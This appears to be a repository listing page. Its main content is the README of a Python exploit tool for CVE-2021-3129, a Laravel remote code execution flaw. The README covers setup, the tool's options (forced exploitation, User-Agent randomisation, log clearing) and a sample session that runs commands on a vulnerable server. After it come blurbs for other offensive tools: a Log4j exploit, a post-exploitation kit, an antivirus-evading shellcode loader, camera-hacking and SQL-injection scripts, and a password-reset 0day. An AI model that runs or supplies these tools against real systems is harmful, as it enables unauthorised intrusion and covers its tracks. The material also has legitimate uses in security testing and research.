Laravel RCE (CVE-2021-3129)

Related tags

Security related resourcesCVE-2021-3129
Overview

CVE-2021-3129 - Laravel RCE

About

The script has been made for exploiting the Laravel RCE (CVE-2021-3129) vulnerability.
This script allows you to write/execute commands on a website running Laravel <= v8.4.2, that has "APP_DEBUG" set to "true" in its ".env" file.

It currently has support for searching the log file, executing commands, writing to the log file, and support for clearing log files.

Setup

$ git clone https://github.com/joshuavanderpoll/CVE-2021-3129.git
$ cd CVE-2021-3129
# pip install -r requirements.txt
# python3 CVE-2021-3129.py --help

Options

usage: CVE-2021-3129.py [-h] [--host HOST] [--force] [--log LOG] [--ua]
                        [--chain CHAIN] [--chains]

Exploit CVE-2021-3129 - Laravel vulnerability exploit script

optional arguments:
  -h, --help     show this help message and exit
  --host HOST    Host URL to use exploit on
  --force        Force exploit without checking if vulnerable
  --log LOG      Full path to laravel.log file (e.g.
                 /var/www/html/storage/logs/laravel.log)
  --ua           Randomize User-Agent for requests
  --chain CHAIN  Select PHPGGC chain. Use "--chains" parameter to view all
                 available chains.
  --chains       View available chains for the "--chain" parameter

Example

$ python3 CVE-2021-3129.py --host http://127.0.0.1/public/
Laravel Debug Mode CVE script
[•] Made by: https://jvdpoll.nl
[@] Starting exploit on "http://127.0.0.1/public/"...
[@] Testing vulnerable URL http://127.0.0.1/public/_ignition/execute-solution...
[√] Host seems vulnerable!
[@] Searching Laravel log file path...
[•] Log path found: "/home/laravel/web/storage/logs/laravel.log"
[•] Laravel log found: "/home/laravel/web/storage/logs/laravel.log".
[•] Laravel version found: "7.22.4".
[√] Laravel log file set to "/home/laravel/web/storage/logs/laravel.log".
[•] Use "?" for a list of all possible actions.
[?] Please enter a command to execute: help
[•] Available commands:
    exit - Exit program.
    help - Shows available commands.
    clear_logs - Clears Laravel logs.
    execute <command> - Execute system command.
    write <command> - Write to log file.
[?] Please enter a command to execute: execute ls /home/laravel/web/
[@] Executing command "ls /home/laravel/web/"...
[@] Generating payload...
[√] Generated payload.
[@] Clearing logs...
[√] Cleared logs.
[@] Causing error in logs...
[√] Caused error in logs.
[@] Sending payload...
[√] Sent payload.
[@] Converting payload...
[√] Converted payload.
[√] Result:

README.md
app
artisan
bootstrap
composer.json
composer.lock
config
database
package.json
phpunit.xml
public
resources
routes
server.php
storage
tests
vendor
webpack.mix.js

[@] Clearing logs...
[√] Cleared logs.

Future:

  • Automatically determine PHPGCC chain if version detected while scanning.

Credits

Owner
Joshua van der Poll
Cyber enthousiast / Developer
Joshua van der Poll
GitHub Repository
Threat research and reporting from IronNet's Threat Research Teams

IronNet Threat Research 🕵️ Overview This repository contains IronNet's Threat Research. Research & Reporting 📝 Project Description Cobalt Strike Res

36 Dec 02, 2022
Delta Sharing: An Open Protocol for Secure Data Sharing

Delta Sharing: An Open Protocol for Secure Data Sharing Delta Sharing is an open protocol for secure real-time exchange of large datasets, which enabl

Delta Lake 497 Jan 02, 2023
CSAW 2021 writeups

CSAW 2021 Writeups Challenge Category Solved by The Magic Modbus ics root2thrill Lazy Leaks Forensics root2thrill Poem Collection warm-up root2thrill

7 Oct 06, 2021
This tool was created in order to automate some basic OSINT tasks for penetration testing assingments.

This tool was created in order to automate some basic OSINT tasks for penetration testing assingments. The main feature that I haven't seen much anywhere is the downloadd google dork function where t

Tobias 5 May 31, 2022
A small script to export all AWAF policies from a BIG-IP device

This script leverages BIG-IP iControl REST API to export ALL AWAF policies in the system and saves them locally. The policies can be exported in the following formats: xml, plc and json.

3 Feb 03, 2022
GitGuardian Shield: protect your secrets with GitGuardian

Detect secret in source code, scan your repo for leaks. Find secrets with GitGuardian and prevent leaked credentials. GitGuardian is an automated secrets detection & remediation service.

GitGuardian 1.2k Dec 27, 2022
Exploiting CVE-2021-44228 in VMWare Horizon for remote code execution and more.

Log4jHorizon Exploiting CVE-2021-44228 in VMWare Horizon for remote code execution and more. BLOG COMING SOON Code and README.md this time around are

96 Dec 14, 2022
Crowbar - A windows post exploitation tool

Crowbar - A windows post exploitation tool Status - ✔️ This project is now considered finished. Any updates from now on will most likely be new script

29 Nov 20, 2022
Anti Supercookie - Confusing the ISP & Escaping the Supercookie

Confusing the ISP & Escaping the Supercookie

Baris Dincer 2 Nov 22, 2022
TCP/UDP port scanner on python, usong scapy and multiprocessin

Port Scanner TCP/UDP port scanner on python, usong scapy and multiprocessing. Usage python3 scanner.py [OPTIONS] IP_ADDRESS [{tcp|udp}[/[PORT|PORT-POR

Egor Krokhin 1 Dec 05, 2021
python写的一款免杀工具(shellcode加载器)BypassAV,国内杀软全过(windows denfend)

python写的一款免杀工具(shellcode加载器)BypassAV,国内杀软全过(windows denfend)

1frame 266 Jan 02, 2023
A blind SQL injection script that uses binary search aka bisection method to dump datas from database.

Blind SQL Injection I wrote this script to solve PortSwigger Web Security Academy's particular Blind SQL injection with conditional responses lab. Bec

Şefik Efe 2 Oct 29, 2022
Cryptick is a stock ticker for cryptocurrency tokens, and a physical NFT.

Cryptick is a stock ticker for cryptocurrency tokens, and a physical NFT. This repository includes tools and documentation for the Cryptick device.

1 Dec 31, 2021
Cam-Hacker: Ip Cameras hack with python

Cam-Hacker Hack Cameras Mode Of Execution: apt-get install python3 apt-get insta

Error 4 You 9 Dec 17, 2022
HashDB API hash lookup plugin for IDA Pro

HashDB IDA Plugin Malware string hash lookup plugin for IDA Pro. This plugin connects to the OALABS HashDB Lookup Service. Adding New Hash Algorithms

OALabs 237 Dec 21, 2022
A python implementation of the windows 95 product key check.

Windows 95 Product Key Check Info: This is a python implementation of the windows 95 product key check. This was just a bit of fun and a massive 5 hou

11 Aug 07, 2022
Now patched 0day for force reseting an accounts password

Animal Jam 0day No-Auth Force Password Reset via API Now patched 0day for force reseting an accounts password Used until patched to cause anarchy. Pro

IRIS 10 Nov 17, 2022
Simple Python 3 script to detect the "Log4j" Java library vulnerability (CVE-2021-44228) for a list of URL with multithreading

log4j-detect Simple Python 3 script to detect the "Log4j" Java library vulnerability (CVE-2021-44228) for a list of URL with multithreading The script

Wade 1 Dec 15, 2021
IDA Python Script for anti ollvm

IDA Python Script for anti ollvm

Shocker 62 Dec 23, 2022
Midas ELF64 Injector is a tool that will help you inject a C program from source code into an ELF64 binary.

Midas ELF64 Injector Description Midas ELF64 Injector is a tool that will help you inject a C program from source code into an ELF64 binary. All you n

midas 20 Dec 24, 2022